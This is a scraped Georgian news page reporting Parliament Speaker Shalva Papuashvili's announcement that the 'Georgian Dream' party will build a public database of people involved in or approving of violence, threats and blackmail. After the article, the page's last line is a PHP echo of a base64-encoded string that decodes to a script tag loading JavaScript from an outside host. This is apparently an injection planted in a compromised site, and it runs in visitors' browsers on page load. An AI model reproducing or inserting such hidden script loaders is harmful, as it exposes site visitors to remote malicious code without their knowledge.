celsiusi
ავერსი საქკაბელი

 „ქართული ოცნების“ პოლიტსაბჭოს გადაწყვეტილებით, პარტიული სტრუქტურების მეშვეობით ვიწყებთ მონაცემთა ბაზის შექმნას, სადაც თავს მოიყრის ინფორმაცია ყველა იმ პირის შესახებ, რომელიც ძალადობაში, სხვა კანონსაწინააღმდეგო ქმედებებში, მუქარასა და შანტაჟში არის ჩართული ან ამგვარ ქმედებებს საჯაროდ იწონებს, – აღნიშნულის შესახებ განცხადება „ქართული ოცნების“ ცენტრალურ ოფისში პარლამენტის თავმჯდომარემ, შალვა პაპუაშვილმა გააკეთა.

პაპუაშვილის თქმით, ეს მონაცემთა ბაზა განთავსდება სპეციალურ ვებგვერდზე, იქნება საჯარო და გამჭვირვალე საქართველოს მოქალაქეებისთვის.

„ამ პირთა წინააღმდეგ კონსტიტუციისა და კანონის ფარგლებში მიღებული იქნება ყველა ზომა, რათა კანონდარღვევა, ძალადობა და მუქარა არ დარჩეს სახელმწიფოს თუ საზოგადოების რეაგირების გარეშე“, – განაცხადა პაპუაშვილმა.

176
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");